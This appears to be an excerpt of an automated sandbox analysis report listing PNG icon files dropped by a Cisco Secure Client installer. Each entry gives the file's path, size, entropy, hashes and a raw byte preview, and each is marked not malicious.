                                                                                                                                      SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Oh%G...G........4..TSG.nO....j..CI.s.7%...fa..ofQ*...x;...<^/,y1.a.R...RA/.f!..)...R....\K..]......'Od..........d.tN.<...../.O.9>.............}.P8e.M.:8.'#........z.Z;.)K.,--%..'.?a..GB...[1r..I\2...4?..SKN|`. ..E..n..hz..mll.z".KhG\>.i.2....;.....|\.ywww.......a..{2*..Io~.UO..t*...'ckk....~.....zB*......I.R.T9!.OF...|...e(z#.N....o.P.+eOH...]..~..@..!...=*....'>...+O\.u..Z.yo...{.......2ieX9..(.Br):.k!..I.c.}S.'cccc..F.......0q"l...k....ve.>...p.coRw2r.D.[...}....h>.Q.*B<.......y...{&B.<...{...9.e7`.......w...*\.Mt..EU...h.].....r.G..;y..`.d..C6.Y.z#.f.r2.y.5.W.<.#!..!..[.5.yp;...OFL.Brv.V.uoe..O....aV.2.p2....d.t.C..'..e...Q7-.g...._...3.N<....}D:.`3.....n.^.0..X.VF..f.'.u...W...p}.(Y.#......M?.......r4.|...*...@).GGz/`...U....3............F.C...[.5...;..kv.[...+k3$......N...c......j.B(..Z...k....&...8.._..E..M..(I..u..Td.....R....C.......b....E/X;....#..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\status_ico_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28939
                                                                                                                                      Entropy (8bit):7.960017526195935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                      MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                      SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                      SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                      SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Mh]W.........CH..#...5.R.R..h$...'e.Cj.T.g....G...Z..v.aB..w..K.I..E.).....d..."]g...P.l.u..>{.?....@..u.>.......g=.....|.:D..~.........|(...q[.g.d.......~..9r.w...'...pnn.P..D$.xx(?..K"..r..9.I.....L.t.9.A\B.D.....^&...e.'.._Bk..M....$|....?....k=...:...N..N..{2*..a/~.UO..t*...'cuu....~.....zB*......IHS.T9!......|.. q.?}......].M,u.|i.90.<.s;y.Q.'..#..FH..3tP.:.i.]6...a.I0'.J...Rt2.!..I.c.}Q.'cyy.R.'uF...j..Sxy.u..}F..{D..H2G...1.`.R.......:..g.}D.Y....y..O=....7|`..].Eg..4.&.....[mzd.9.e......{.}.;.e'`u.sB..M...;#}.I.%R......Dd=.z..#.Q...;..j.E...;...o...b.D.p.v..I.L.\"i.\2.GD."G..ti....ui..W.........p.....sS+j...A..........]/F...ybst...4}!.....d.i.....,.M.Y..../.v.......Q...He....DM.;V.&:^......D.ka.l....^.....{...L......F........=...yB..U.#.QwD.<!....5.ZO...0yB^.........K#L...^.]....(.R.X.d.+.'y?..d."T:OH..s...J?{E|.....;....)....o.=.:+ZUp..H{{{......F.;[.8...H......

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\status_ico_good.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29327
                                                                                                                                      Entropy (8bit):7.967732566337996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                      MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                      SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                      SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                      SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..]le...V...>H.mE .1.[.0#Q.6.%=..l.....ln.sC.8H#.........F..W5.-."vq1..`.:.b4..$H'-.]3.n.d.i..A.].....G..6.^{}..{=?ic...^{.w....?.cV..;B.........4[..n....r....boo..9c.9..<.(g...].{..]O....OY.b.cqq./x..9u.Uk'...R:...'.....=.G'''...t.....>..4...'...h...."...K..../7z.MOF....'....#...>.|...S.j...3g&...~..1.:.:WB.uWJ..R.dT...'!K..rF.&E...^.......Z.........A...E..........`N...s.b. Wx..)[....o'B....}.E+c6..!.._.+Z.......R.B..G..8..D....._..N.....lle........./'#....W..]...........`0......?.^....t.......g?....j..*..C......KE]..z...P..W.k....PWF..aUT=O*.+.7.]...QA..uz.c.D.IOF..w..hx.E.{pp...1Y..-`{ELN..}....7.0...._..Q.6z....MN...Y../..+...'B.W.s.:?....[.NDBr2._..;;..U(..!......I.7.....k..W_.R..j...'...A.......e.o.\.tkm._...S,....'.....].>....dL.z.\.ml...15u.....6^.6w.:.:.U..e.....A;.)...f,,,.z....{Oi9"....$.V.p....h...L.7.u.d.%...1..o..x..J...N5..;...Z...y.I..hj..&."q.O..2..-1.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\status_ico_neutral.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31702
                                                                                                                                      Entropy (8bit):7.968827949628217
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                      MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                      SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                      SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                      SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx...l]...2j...J.H......vf2e..8....Tu.4j...p50E...P.8.+.k.. Z..%.F...#..5..SR'.B{....d:p.;.7P.Nf*........d.}..g.[k....#.....g.....%H...!..~.T.^...'&&..2>>./...A......e.EX....v....e...nb.....E..(}yO......O.ttt.:...8...%k...rW.....h$..^.L..<..5.V..{..7...,.#..r..x...$...$..H|!...A.^.4.$..Ht!t_. I.J....bXy!$E].$...(."..X.B<..c....i7...p!.....X.s.\..^...............~....>.6^..8;...D..>./.hs.Q..u1f..hii)...I......q.....8s..F...0..i+\x<...A..22lZ..&x....y%\.....7..b.iTH...z..1....G.$........1a.d..b..Kvh...V...*<"*1.lG..p..?.B....)q...q.'o..6mJ..G.y.....=.....1...R.8.....3..7.tc..l...../....L...Fs?&Q....G?J}PI~.v!.......Cm..P.;....T..=....%.....*...^.s...~x.~....}.5.\...o..}]..s.....2......?...-?....tDW(.b.K.X.o.........;.w...w.........\..0.o..N.......^...7..........d..].........{....+..o...... '...).....]..n.G...+....Q...IvB.......x..y...^..3.sm..I...Hb.]g..-.g ..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\status_ico_noncompliant.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26026
                                                                                                                                      Entropy (8bit):7.927985837095832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                      MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                      SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                      SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                      SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._l.G....ZF.0..4...R...z.G..i/z.6.,...eE.!..s.(...0.E...{0.~.........$.2f...^J.....7.-.1nR'....\K...0.2..Ak.._*....Y..""#"...&U&..."...._*...-.....e..n..7.....m.Di.O...o`{[......y..6.>1..P.....D.'..z]..Q.2.u..^lll.. /...E..h..2..j.j..j|.c.......X&.h.".N..k%...c...L.........e.....j6...[....D....9^"....K..}}}.Dt2..g<..'B.I.....[q....d.:..OB.4'%..I{7.y"..~... q.?iLw..q.[..+...y".8.q.Z%}}}.D....{<.3'"...i6.|.I|..NF.eo....D.t;!..G.....s.DP.c.+=v.'......'B....x.+..A....M...3..O..-@...;.J...U!.t.D.itexw"..G?....gE.;.^...4.C...E.I6.I..U!.gLCC....kT.....'E...;j.V..E..f$........+.*."$.n.n"..!.S..."...$y..F.....+.afff...}rHZ`3$.d.Xs4%.'c..g@0;;K.D..w......pee....7...z.2FGGc.''.T.>l....^g>...............R...ty/...o.....,...~.m9p....r.3.~...1......$1....Y...X.-:.HJ..v...N.C........pR...YL...............6.t......)O...sQ.._.g..y..I.....z.w..X..b{..t.2.\/n.n.d'..k...6...F.|.|...].-.N..N..q..".......l..%

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\status_ico_transition.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5803
                                                                                                                                      Entropy (8bit):7.950077949239442
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                      MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                      SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                      SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                      SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............>a.....pHYs...........~....]IDATx..]{l[.y..."-?r...:.e'K..).9.R...%h.......0..m.?.y[.a. ...x.C.6t.......N.u3.......FJ.d..Dt.%.._.%>..;<7.)..;..R...@K...=.|..}.|..h..6.h.....U2.(......c.g...<..c.1@L..[....D"....F.4..3..MM.h.N.....9-..U..e.... .."...Ad.....>*'..lF......d.0.8....4E+..O..i.V<.....5==m5.x..w.......8^.b<JD.H.....&''.Fp'./....>.6.z...MO....T*.2D....}E.e...6. .I.z....fffZ..u.>...DL.1....acW.0.2....U.{.........W.c..!%W0W=. .......U.*0F.U...e....B..b.......c.Z...JW.\.... D.#.....h4.H...W.5F.w..;'~..o."...%..l.....|.#.w.......~"....H.^V.f2.f.x<.7GGGk..u."....?...1....}.3.......d2..L.|C...k...>.wo9.b/.p.r.. k....r`.2).m.u.8.*3$.I.....$=..@3. a.f<.J...A...E./$.8.4MY....u.Sh.#.1..,A..?.BR2.g....h4.......2......S4.2..S&....!.....B.J........d..........n.}w.0..]...t.5.x............Z.s_B.Y....f...?..A!..!.&#.&...|C!GV>K..z.jh.U_..x..n2@.4............0J../...Y.sD..I7.7F.........kKD..@l....">.. .g..K|..|./.1...&@.A.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\status_ico_trusted.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29723
                                                                                                                                      Entropy (8bit):7.971507308971378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                      MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                      SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                      SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                      SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._h].....Er..uQh..T2...E#.0m.....d...i/2.%2..L....N....L;.....%>..g.-.!...ER!&.j9..y..2.u.....x ..w.Y;.^{......~@..K{....~......,.!6....._.>(../........../~....FO.!....d.a.9thp..^.'t=...4>d.%....x.=....Z;.e.....=.^...6'....;88....o..k?....{.....ir2j..&'..:'fqqQ\.x...{2*..~./^..z.....5q..J.....!.~..q..N..0..+....z2...'!K..rH.&ET..^......4vY.;[.......b.q+d.].te,//.s".<.{.....\.+.le.^......+$.u....PO..v|./.he....O.J.......=H.....7cy..q......Y.k]......N......g#.I....M..?.........."{.dO...^.k..U....NH.qg....X..#.5|..E....7r..}.NF..4..J...w~.._....E.".Qu.:.E...{..l...U(..D..P...d..K.z.h..%/^.w\;.N..d...|.Q...X....2=.......W.......eR.X..~....;.Uo.w.....3....#.....7'.....q......f...D$$'ck..'P.G.y..v..!......A..T....*..w...F.U...OF].............V....*..biU$4>.U..y..OvB%=.S....B..b.DLM....WyQl..:c.a.D..o.6.\&kkk^.....Pm....=....kZ...~.*.u2.Qjr....lL..q...km.b|......>...E

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\sync.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1264
                                                                                                                                      Entropy (8bit):7.787798189239225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                      MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                      SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                      SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                      SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...C...@.....A^......pHYs...#...#.x.?v....IDATx..\;R.A.m0.3...8.*C...o.@'.D.%N.:."..q..*o,...@........~.Z-.....J.*}fGo..t..h.jB.D]"b.#"zCD..+.D..,.,...X).q.......:.."...}#.Y:X.........!.1":...1w.`9.=p02.$bw..VP....C..M...F..`.\....w /2.$..5.bQ.^.C[.X.t.\.N..8....[XCQ...Q&.<~...'\C..s.j%.d@ ..8..y.0.9#....0-......q...]..1../....).t.<....L.V....@)N..HQ..+B....9W|d.K..^8..W2-!.}...... Z...e..jB.).9S..Uc.PsF...r...n.+.....:2n..".....!l....E.%'.I.......!$.."._....*....H...?.....HD......7F.u.+...Ke.+.S2`.C...M.........2F2.p.q...ZU\$..E.UX....p..4M..f.Pb...2..k..J..,.D....e.E....i..zc@...tX...s.t....>4"CM...47}....p...\..x#.(....96.yd...._.@.6...C7..2.P....QD...3...7z..d`...3..]...+.b.`k..5....I.#K.V.%.F.h6`. f...g.....G..l....~"l..17.{. m.......1S..$z@.....4....5.........ks.E....._....52L.T.....m..`..;.r....&..p-...}.s.l.S....d%.q..[2...a.. ..|..4.1...v.....j.|b..d0\.....{..6.E.*22.S"..JHa.U.\f.. c.m..!t.HH.MS.sU.P&.Y.!_2.^..V..(S..=

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_amp_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14308
                                                                                                                                      Entropy (8bit):7.981829207860698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                      MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                      SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                      SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                      SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....{.......!.}V...U.`...Z..X.....j.j.\*!.V..P..........OM.AhQ.l.[5... .\ ,.{~s..g.=g..v....'..ef..w._J.bn.)(.-$.m....l.....[k..47..G..v....W.5...5.Wz.....'.._6@.$@....>....].g.....=..G......V$;.'..........._6 .$@..WY.U....)q;U+.V].[..qR..a..T.\O...Y....u.v).q.-..d+..]...._s<.X..sJc.TO..v.G.og....Z>T...'.`.[.x;....l....>...e.:.x...|.n.d.=....2.aKt;.....}....W.B/<6%.D*......?q....I..:~..}a.d.`'a....+R.')8..|j.....W.s..w*.|.I.oy:....'aO...txa...w....M.)..!q.S.>g1..+V.{.wL..eO.x.......a...k#.[....^....b.D4.z.....X;..e.d..O.a.D...%...+H....u^.{..vm.....c5.Kl..+.V.....&.n]:KO......l;...Q../.r*.U..........6n.....p.^...4.......1..].i..C..%O.q.W5.4....;..h..].I.B.(....-.ex..:.l.....i.N..qp..=...I_..8.E.I.j...R/.i.1..x.............?.&o......W.57.5..t...E..%D.<..@3N"*..b%8Q.1..1....V.B..8Q.o.....).<...1.T.x.L...h...KdOc..V3..E...Z'9(.<.U'.D.....MY........4...}...R.rL........g

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_amp_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13810
                                                                                                                                      Entropy (8bit):7.9753795366170355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                      MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                      SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                      SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                      SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....B.R .w4..-.p-b..o".....`U.R+.+..=..<....J.b...."..U...ATD.....R....G. ..Nf.k.^k..k.%........3..o}..T...y........Pkt......r..wj_.~z...^....l|2....L._...>.I.../..^...N.6.$...:Q.N.iK.........V...X%N&.[Q.-c'....W.p,~U..-...S.....N.z~.w. .....;..<..>.?..._oK....w......3..[U[.....o.?..U.>.[...lR...D...u.w.../n.Y...{.x8O...M,......;.d<..1.._7).D&`.....N..3jx.g.S.[....N.n#..^?H...x.'.^}.i......_H.....I~1..;.S....;;.......x.w...............~@oly.;....F..]...i.?.P.6m..Q...#%.%...$<.p..W]...'.A....._uL;.o......_~.>........L..O.}..b....I.Gae.n....U..Y.6m.....+.-4.;.].............p...A..g.../...N..+(.$...n..S..&.....\z...]..y..v...?[...=.NZ.\.*...#.J***f.q`#..*H..W.45.V.{...G..<IT..'K.f*;Q.Vz.....u7.W";AT....1.-_.$.'d...-.<.c^o%::..L.%N<.+sLVc,.q.^'..i5&*/.6.....i*...Y.N......4$.!(...p1..6U..._.8....#{g.A..@.R.#..)........i............ ..F..S.......Qf.~..u..9......M..cN:.7F'..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_amp_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10811
                                                                                                                                      Entropy (8bit):7.9725003667897125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                      MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                      SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                      SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                      SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx............`....L)VT.U..Id.`*....jt.$.M...`m.........+.T4..8.....d3...^..R1.Q.K.5+. [.....sN..}.q.._...........$+.D..Rm.O..`./..=..?"........n..(.T.6.I.......sg|......K............x...p'.V.....6.........w..d..v...S.Yiu ..xf..*..!7."t.0........F.;u...3.y...........\...Yy..g...w...........=..J{.7..G.<..>..I."........Lwv..s..V..[.;.v0v...].....o............'..e....9=....?(........g~~O.@*..........|<.A..t..o.....f......K.z.'...}F*p.... ..9x.......U...e..m..;...R.@x..^...Mas.Y.=.?\..{.us.. .Z.o:..L..q.Q.>.?.........1ET..5.|....`.P...AF6_.R|.=.{......B......w..s..k.%3.....3R....3H....&._1.L8.,ydq;y.c....6..7B..+.8..l.'=HR...Y.!j..<...=.>.<.x .w..M..._,.x0....q.,.LB. ....6.yxh....\B._..\..E..k..}..o}....[.6/...0z1.......v.D.s3..L.LV..%.MJ$;P.v.\.=..L...J..$......./....H.....x^.m...l/-.....<.-,..e..cD...;>g....0..Z...n..@.0BZ.3..x......,.9..?}.....d.....H...#_.....S2QZ.._

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_nac_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13727
                                                                                                                                      Entropy (8bit):7.982847912604664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                      MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                      SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                      SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                      SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..].t...7h....k..B..S......5Q.O.l..-D.....K....*j.X.T.....T.....66..D,X.B..J..@...}...3.s...{.|k...?3sf.>..oJ..^..-(.BDk..o.<........... =......"......\..{.....q..-(N.T...UZ.y.'p"..=Y.Ip.....K.^.:Q........E.wp..+.$..3..*]...0.J.....)_......*x...\M...1..$:.{B....0..e..]0..Z.Y.]...D'...k...p~....3D_.O,;..O..../5....#h..?./?8..[....7..#.....f.4*?e..}..j|e.......'.....d.N...b./...D...p...h]._S>9D.~..M.M.....M.|.@.-.Rr.$..k6.....2..7..v.L.?.Vb=...tl(...1x.._.....fJ$.C.......go...6.c....m.^.N.L&.....}/.j.})_......[.\...k5.....{EK...."......m...G.:.D...\w.q;.p.*%`.}..g.x.D/.c............HE%".d..?..'...DB.......U...<....k....y..N...8...f=..5. ....qO.[P.GD;.h......y...b..... .TT..}..:....M.l....w.wG.h.3....S........O..M...;.wF.p..xCt..T.I.2y)v.Ip6....`....H..V...mi...?a.F.Z2.(%....S...y.W..A.$.}N..(.....m.I..7e.....dr..=..n.7.-....I........L..5y........->1.".R.x.......n.^...Go.9~.!.-....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_nac_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13633
                                                                                                                                      Entropy (8bit):7.975971786407776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                      MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                      SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                      SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                      SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                      Malicious:false
